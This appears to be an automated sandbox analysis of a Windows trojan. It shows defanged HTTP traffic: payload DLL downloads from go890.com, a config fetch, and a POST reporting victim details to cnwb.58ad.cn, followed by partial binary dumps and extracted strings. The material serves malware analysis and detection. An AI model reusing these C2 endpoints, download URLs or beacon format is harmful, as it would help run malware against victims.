Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Fri, 02 Sep 2016 17:46:49 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDACRTTRAB=JJNGNJJCFAFFBPMOMMGPILNC; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=gb2312">..<title> ....IP.... </title>..</head>..<body style="margin:0px"><center>....IP....[194.242.96.218] ............</center></body></html>..
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.haosou.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Fri, 02 Sep 2016 17:46:55 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 14:02:24 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 30 Aug 2016 05:59:59 GMT
Content-Type: application/octet-stream
Content-Length: 196608
Age: 1
X-Via: 1.1 jfzh181:7 (Cdn Cache Server V2.0), 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y...y..\yRich..\y........................PE..L......W...........!.........>.......@.......................................P............@..................................6..P.... .......................0..H....................................0..@...............@............................text............................... ..`.rdata..tM.......N..................@..@.data...l....@.......0..............@....rsrc........ ......................@..@.reloc..H....0......................@..B........................................................................................................................................................................................................................................................................................................................................U..j.hP1..h.i..d.....P...SVW..@..1E.3.P.E.d......e.3..u.d.0....E..u..E..x.......;.......f.y,.su.A0....nt...Nuf.P...tt...TuY.P...dt...DuL.P...lt...Lu?.P...lt...Lu2.x..u,.P...dt...Du..P...lt...Lu......<lt.<Lu..q......u..........e.3..u..E........M.d......Y_^[..].............U..j.hp1..h.i..d.....P...SVW..@..1E.3.P.E.d......e..E......MZ..f9.t..E.....2..M.d......Y_^[..]..A<...8PE..u............e.2..E..E......M.d......Y_^[..]..........U..j.h.1..h.i..d.....P...SVW..@..1E.3.P.E.d......e..E......u..I.N.u.
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2016 17:46:32 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Fri, 02 Sep 2016 14:14:48 GMT
Content-Encoding: gzip
3c74.............}.s[G...L...Xfg-.. .@.<......5;;...&.T...........l.d.U.a.RS......=8$.......x. .'%k$Y...,..4.h.R..\\.......@6.l.x........9}...?../>.....'..qR...7.....p.................o......\...z...6.uZ.fh.'.3..P..S...MOOs..\.~l....].{.pq..Ac..\.Q1p...;Uo...Fk8}.}..TJ]N}Y)S..I.Q..o.*....O.|....Z...g....9....Qy.8.W..#W........_@..8Cp....Q.).............E...i../..;...s...K...{~%.^t.....!..F...&O.Q7..ie....?S.L...C......7}..J.\...n9...Tsr...../..l... ..............R......s..[.w.OSK..I.R.o."S..s.k..dc........m.#2..4H.O9x^.W....7 .J..G.>.....D.j.Z;.Q...........8.Qr...8FRN..._........*......>....~.1..........:;~.......a..;..r..[..8.;/..y...u......)...;.......O...r...'......p.......~.$....?.... ..|....._Gt..x....].V....B.>..kd.r..uS...I......LP...>1@>.......O.Gh......Q...IR..i=...&-I\....;?.|..R H.(.....~B..MQ.5nK....qtP2@..1.g....:...Cr....T....2.\5$.R... .....&.".PJH..pX....wNr.....S..Qy....~.|}B......|.!9R.tZ...i.V...jt.y.@....F.....*.\....*.9?&ox...@..?.o.?6...../.9y..........dW......c:..0..2.._...*.T...>IL.~.:...F..h...nT.......'...VO....!.....9>..@..&T.o.O.l../......o.m.}..&M.7.w...2...Q....v...v..F.|.[}....).....[.....3..T.n.......8.Km.V......b!....-n.H..B..m..7......7.9.{)Z...q&xU........3Q8....nD.[o...P.V.3...J(~-.z...#..s....GgA...2.zL{z@N....|...Ipc&r....~.a%.O..s...p..L..8..`<..|B4.6.F4J..ZaT.. H.3..!m.......\....dr.vl...L.h.n.BOw.Q.w'B:p......%..K..i.(./....c/[\$..vQx1......~...k6nF..._...v.u....K_o..w8..../...... r..P.....k._.u.R...#....n.....*..!..G...E.cg.......}...jI....
<<< skipped >>>
GET /index/getcfg?id=1 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Fri, 02 Sep 2016 17:46:36 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=98vb0q0l9p2151g3helo8edbb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Encoding: gzip
1000a..............w.$.q&.U.@../.f..E0...A.HH........f..LwO....=Y6s@..;...duuu......_..W....._~..ur........6...}.........q\.A...VQ[.~..}...z.........[...~.U.t...Q.I....../h9.....[...o..>..5..<.w......".Nvg..]....e{.........%..?*.7..Kq...-...E..sS...."..^ ..........1.?..nU.........S......;.W.6.v<.\.O.9...v...1.... ..uw....$...M.........w.....v..\..r...{....u....n.\......0..T.?.6@F......P.A..W.}. ......_V...B|.%........3.es8..u..].0..?..}...M..I_...~....&(................... ...u_...c..^...cr6k.o~n..|..56w....}&..fC}.....G.........N..l.UP,v.....=*.....Y5..*v....gz..M.....c;6..M......q...(....r.bs....^.........?..v....]...g.7E.<.O@^S...../......:(,"..4........!n...l.....mV%I....^.<m.e...~.i..V}E!...d)N......."iz3..G.....?......di.;...ATy.>.....&...D./...H.v.....<4..6.<#......s.p]o.D.o._..?..L................:...G.....f..YR.G0.?..4.Gl..6...K$i)..b......"*.fo^.[.._.Z~...O...~.......1.].........v}P.....&....h7.7.....K........M:.r...>N....,....Y...?............vk.=.u..]W4..G..../.9N.>.......h.....6..].....o./.p...j.]r....o...e...G.ti.....&.|......5..E......#i..V.CPe.<...._.w.E...j..o[7M...*nn....7/...xW..1}...A.c}.3..=.........C.....n.....F..9-..O..b.a.....YT..........-...u.......]w......#!.n.......].!y...}...T......|.XT.....e..8......I....?<..S......]..!.....(.T.....6...K........7~.u..s..wG...~m...VlM...W..-&...M.D......L....PG.."Q......&.......u.....i.......}.. ..(...b..[S.5.'39Q....j3......~.....o?.7..h.G.....{.?....Y....|....2K........%..`.. .*...@/..pP.7..%UR...}..dXL#.5#Y.E...
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.ip138.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 03:31:31 GMT
Content-Length: 18524
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Fri, 19 Aug 2016 02:18:00 GMT
Accept-Ranges: bytes
ETag: "864aa0e8bff9d11:4406"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 51315
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>..<head>..<meta http-equiv="Content-Type" content="text/html; charset=gb2312">..<meta name="mobile-agent"content="format=html5; url=hXXp://m.ip138.com/">..<title>IP........--.................. | ............ | ............ | ........................</title>..<meta name="Keywords" content="ip,IP....,IP........,ip138">..<meta name="Description" content="ip,IP....,IP........,ip138">..<script language="javascript">..<!--..if(window.top!=window.self)window.top.location.href='hXXp://VVV.ip138.com/';..function checkIP()..{...var ipArray,ip,j;...ip = document.ipform.ip.value;...if (ip.indexOf(" ")>=0){3....ip = ip.replace(/ /g,"");....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("http://")==0){....ip = ip.slice(7);....document.ipform.ip.value = ip;...}...if (ip.toLowerCase().indexOf("hXXps://")==0){....ip = ip.slice(8);....document.ipform.ip.value = ip;...}...if (ip.slice(ip.length-1)=="/"){....ip = ip.slice(0,ip.length-1);....document.ipform.ip.value = ip;...}...if(/[A-Za-z_-]/.test(ip)){....if(!/^([\w-] \.) ((ac)|(ad)|(ae)|(af)|(ag)|(ai)|(al)|(am)|(an)|(ao)|(aq)|(ar)|(as)|(asia)|(at)|(au)|(aw)|(az)|(ba)|(band)|(bb)|(bd)|(be)|(bf)|(bg)|(bh)|(bi)|(bid)|(biz)|(bj)|(bm)|(bn)|(bo)|(br)|(bs)|(bt)|(bv)|(bw)|(by)|(bz)|(ca)|(cc)|(cd)|(cf)|(cg)|(ch)|(ci)|(ck)|(cl)|(click)|(club)|(cm)|(cn)|(co)|(co\.in)|(co\.nz)|(co\.uk)|(com)|(com\.ag)|(com\.br)|(com\.bz)|(com\.cn)|(com\.c
<<< skipped >>>
POST /index/eventup.html HTTP/1.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
Cache-control: no-cache
Host: cnwb.58ad.cn
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
event={"info":{"pid":1,"pip":"194.242.96.226","cid":"7F4E176E87AAF89EB8728D99FFA86566","cip":"192.168.11.131","type":2,"source":"EXE:2.0.0.30,DLL:2.0.1.7
","quantity":1,"time":1472820454,"code":"5636xanewong!Q@W#E"},"data":{"os":30,"game":0,"charge":0,"adv":0,"nodisk":0,"film":0,"culture":0,"police":0,"fire":0,"brower":0,"other":"EXE:2.0.0.30,DLL:2.0.1.7"}}
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Fri, 02 Sep 2016 17:46:55 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.27
Set-Cookie: PHPSESSID=n8g9o4ccsvmpb5jvqbe7kelie6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
1..
GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Date: Fri, 02 Sep 2016 14:02:18 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 02 Sep 2016 11:43:04 GMT
Content-Type: application/octet-stream
Content-Length: 825856
Age: 1
X-Via: 1.1 fuzhou183:2 (Cdn Cache Server V2.0), 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1832:
.idata
.rdata
P.reloc
P.rsrc
.aspack
.adata
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password
0.0.0.1
TIdTCPConnection
TIdTCPConnection|
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordP
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocolPIC
TIdCustomHTTP
TIdCustomHTTPPIC
TIdHTTP8KC
TIdHTTP
HTTPOptions
Port ;C
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
KERNEL32.DLL
1.2.8
&tn
&unc
&vendor
&Error